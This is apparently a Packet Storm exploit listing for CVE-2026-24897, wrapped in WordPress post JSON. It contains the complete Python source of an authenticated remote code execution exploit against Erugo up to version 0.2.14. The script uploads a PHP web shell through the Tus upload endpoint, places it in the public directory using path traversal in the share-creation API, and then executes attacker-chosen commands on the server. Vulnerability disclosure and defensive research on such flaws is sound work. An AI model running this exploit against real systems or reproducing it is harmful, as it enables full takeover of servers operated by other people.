{“lastseen”:”2026-05-05T21:31:00″,”description”:”Erugo versions 0.2.14 suffer from an authenticated remote code execution vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Erugo 0.2.14 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220373″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24897″],”sourceData”:”# Exploit Title: Erugo \\u003c= 0.2.14 – Authenticated Remote Code Execution (RCE)\\n # Date: 2026-02-02\\n # Exploit Author: Abdul Moiz\\n # Vendor Homepage: https:\/\/github.com\/ErugoOSS\/Erugo\\n # Software Link: https:\/\/hub.docker.com\/layers\/wardy784\/erugo\/0.2.14\/images\/sha256-d3da70b337212a6c774b7028256870274edc2ac40536fcc0f1706cbbc4ed4fbf\\n # Version: \\u003c= 0.2.14\\n # Tested on: Linux (Docker)\\n # CVE: CVE-2026-24897\\n \\n import requests\\n import json\\n import sys\\n import time\\n import base64\\n import argparse\\n import random\\n import string\\n import warnings\\n from datetime import datetime, timedelta, timezone\\n \\n # Disable SSL \\u0026 Deprecation Warnings for clean output\\n from requests.packages.urllib3.exceptions import InsecureRequestWarning\\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\\n warnings.filterwarnings(\\”ignore\\”, category=DeprecationWarning) \\n \\n class ErugoExploit:\\n def __init__(self, target, username, password):\\n self.target = target.rstrip(\\”\/\\”)\\n self.username = username\\n self.password = password\\n self.session = requests.Session()\\n \\n # Standard Headers\\n self.session.headers.update({\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Exploit-DB)\\”,\\n \\”Accept\\”: \\”application\/json\\”,\\n \\”Tus-Resumable\\”: \\”1.0.0\\”\\n })\\n \\n # Generate a random 8-char filename to prevent collisions\\n rand_str = ”.join(random.choices(string.ascii_lowercase + string.digits, k=8))\\n self.shell_name = f\\”{rand_str}.php\\”\\n self.shell_content = ‘\\u003c?php system($_GET[\\”cmd\\”]); ?\\u003e’\\n \\n def get_csrf(self):\\n \\”\\”\\”Initialize session cookies\\”\\”\\”\\n print(\\”[*] Initializing session…\\”)\\n try:\\n self.session.get(f\\”{self.target}\/login\\”, verify=False, timeout=10)\\n except Exception as e:\\n print(f\\”[-] Connection failed: {e}\\”)\\n sys.exit(1)\\n \\n def login(self):\\n print(f\\”[*] Authenticating as {self.username}…\\”)\\n url = f\\”{self.target}\/api\/auth\/login\\”\\n data = {\\”email\\”: self.username, \\”password\\”: self.password}\\n \\n try:\\n r = self.session.post(url, json=data, verify=False, timeout=10)\\n if r.status_code == 200:\\n token = r.json().get(\\”data\\”, {}).get(\\”access_token\\”)\\n if token:\\n self.session.headers.update({\\”Authorization\\”: f\\”Bearer {token}\\”})\\n print(\\”[+] Login Successful.\\”)\\n return True\\n except Exception as e:\\n pass\\n \\n print(\\”[-] Login Failed. Check credentials.\\”)\\n sys.exit(1)\\n \\n def upload_payload(self):\\n print(f\\”[*] Uploading {self.shell_name} via Tus Protocol…\\”)\\n \\n # 1. Tus Creation (POST)\\n post_url = f\\”{self.target}\/files\/\\”\\n \\n # Base64 Encode metadata\\n filename_b64 = base64.b64encode(self.shell_name.encode()).decode()\\n filetype_b64 = base64.b64encode(b\\”application\/x-php\\”).decode()\\n \\n headers = {\\n \\”Upload-Length\\”: str(len(self.shell_content)),\\n \\”Upload-Metadata\\”: f\\”filename {filename_b64},filetype {filetype_b64}\\”\\n }\\n \\n try:\\n r = self.session.post(post_url, headers=headers, verify=False, timeout=10)\\n if r.status_code != 201:\\n print(f\\”[-] Tus creation failed. Status: {r.status_code}\\”)\\n sys.exit(1)\\n \\n location = r.headers.get(\\”Location\\”)\\n file_id = location.split(\\”\/\\”)[-1]\\n \\n # 2. Tus Data Transfer (PATCH)\\n patch_headers = {\\n \\”Content-Type\\”: \\”application\/offset+octet-stream\\”,\\n \\”Upload-Offset\\”: \\”0\\”\\n }\\n \\n r = self.session.patch(location, headers=patch_headers, data=self.shell_content, verify=False, timeout=10)\\n \\n if r.status_code == 204:\\n print(f\\”[+] Payload uploaded. ID: {file_id}\\”)\\n return file_id\\n else:\\n print(f\\”[-] Data upload failed. Status: {r.status_code}\\”)\\n sys.exit(1)\\n \\n except Exception as e:\\n print(f\\”[-] Upload error: {e}\\”)\\n sys.exit(1)\\n \\n def trigger_path_traversal(self, file_id):\\n print(\\”[*] Creating malicious share…\\”)\\n url = f\\”{self.target}\/api\/uploads\/create-share-from-uploads\\”\\n \\n # Fix Date Warning: Use timezone-aware UTC\\n tomorrow = datetime.now(timezone.utc) + timedelta(days=1)\\n expiry = tomorrow.strftime(\\”%Y-%m-%dT%H:%M:%S.000Z\\”)\\n \\n payload = {\\n \\”upload_id\\”: \\”exploit\\”, \\n \\”name\\”: \\”exploit_share\\”,\\n \\”recipients\\”: [],\\n \\”uploadIds\\”: [file_id],\\n \\”filePaths\\”: {\\n # VULNERABILITY: Path Traversal\\n file_id: f\\”..\/..\/..\/..\/..\/public\/{self.shell_name}\\”\\n },\\n \\”expiry_date\\”: expiry,\\n \\”password\\”: \\”\\”, \\n \\”password_confirm\\”: \\”\\”\\n }\\n \\n try:\\n r = self.session.post(url, json=payload, verify=False, timeout=10)\\n if r.status_code not in [200, 201]:\\n print(f\\”[-] Share creation failed. Status: {r.status_code}\\”)\\n print(f\\” Response: {r.text}\\”)\\n sys.exit(1)\\n print(\\”[+] Malicious share created.\\”)\\n except Exception as e:\\n print(f\\”[-] Error creating share: {e}\\”)\\n sys.exit(1)\\n \\n def execute_command(self, cmd):\\n shell_url = f\\”{self.target}\/{self.shell_name}\\”\\n print(f\\”[*] Executing command: ‘{cmd}’ at {shell_url}\\”)\\n \\n time.sleep(1) # Wait for filesystem sync\\n \\n try:\\n r = self.session.get(shell_url, params={\\”cmd\\”: cmd}, verify=False, timeout=10)\\n \\n if r.status_code == 200:\\n print(\\”\\\\n\\” + \\”=\\”*50)\\n print(f\\”COMMAND OUTPUT:\\”)\\n print(r.text.strip())\\n print(\\”=\\”*50 + \\”\\\\n\\”)\\n else:\\n print(f\\”[-] Command failed. Status: {r.status_code}\\”)\\n except Exception as e:\\n print(f\\”[-] Execution error: {e}\\”)\\n \\n def main():\\n parser = argparse.ArgumentParser(description=’Erugo \\u003c= 0.2.14 Authenticated RCE’)\\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target URL (e.g., http:\/\/localhost:9998)’)\\n parser.add_argument(‘-u’, ‘–username’, required=True, help=’User email’)\\n parser.add_argument(‘-p’, ‘–password’, required=True, help=’User password’)\\n parser.add_argument(‘-c’, ‘–command’, default=’id’, help=’Command to execute (default: id)’)\\n \\n args = parser.parse_args()\\n \\n exploit = ErugoExploit(args.target, args.username, args.password)\\n \\n exploit.get_csrf()\\n exploit.login()\\n fid = exploit.upload_payload()\\n exploit.trigger_path_traversal(fid)\\n exploit.execute_command(args.command)\\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220373″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220373\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T21:31:00″,”description”:”Erugo versions 0.2.14 suffer from an authenticated remote code execution vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Erugo 0.2.14 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220373″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24897″],”sourceData”:”# Exploit Title: Erugo \\u003c= 0.2.14 – Authenticated Remote Code…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-51569","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n